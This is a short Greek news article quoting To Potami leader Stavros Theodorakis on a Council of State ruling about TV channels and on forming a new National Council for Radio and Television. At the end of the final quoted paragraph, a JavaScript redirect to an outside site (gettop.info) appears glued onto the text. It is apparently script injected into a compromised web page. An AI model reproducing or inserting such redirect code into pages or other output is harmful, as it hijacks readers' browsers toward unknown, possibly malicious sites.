Θεοδωράκης από Καλαμάτα: Θέλουμε να συγκροτηθεί ένα ΕΣΡ

0
5

Σχολιάζοντας την απόφαση του Συμβουλίου της Επικρατείας, ο επικεφαλής του Ποταμιού Σταύρος Θεοδωράκης, από την Καλαμάτα όπου βρίσκεται τόνισε ότι η πρόταση του Ποταμιού παραμένει η ίδια, ότι «η ανάγκη της χώρας είναι περισσότερα κανάλια, περισσότεροι εργαζόμενοι, περισσότερα λεφτά στα δημόσια ταμεία και περισσότερη διαφάνεια σε σχέση με την προέλευση των χρημάτων».

Για τη Διάσκεψη των Προέδρων για την εκλογή νέου ΕΣΡ, είπε ότι «θα επιμείνουμε γιατί και έχουμε τα πρόσωπα και θέλουμε να συγκροτηθεί ένα ΕΣΡ».
«Θέλουμε», είπε, «να ξεπεράσουμε και αυτή την δυσάρεστη εποχή αλλά και να μη γυρίσουμε στα λάθη του παρελθόντος. Να μη γυρίσουμε σε ένα περιβάλλον που κανείς δεν πληρώνει και κανείς δεν υπολογίζει κανέναν».

«Μην ακούτε τις φήμες», σχολίασε για το ενδεχόμενο συνεργασιών, για να τονίσει πως «το Ποτάμι θα επιμείνει ,καθώς δεν γεννήθηκε για να βελτιώσει απλώς τα άλλα κόμματα, ήρθε για να αλλάξει το πολιτικό σύστημα».

«Θα παραμείνουμε Ποτάμι, θα επιμείνουμε και ελπίζουμε ο κόσμος να καταλάβει την ανάγκη να υπάρχει ένα γερό Ποτάμι, ένα δυνατό Ποτάμι, ένα ορμητικό Ποτάμι, ένα καθαρό Ποτάμι που θα τα αλλάξει όλα στη χώρα χωρίς όμως να την γκρεμίσει», σημείωσε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here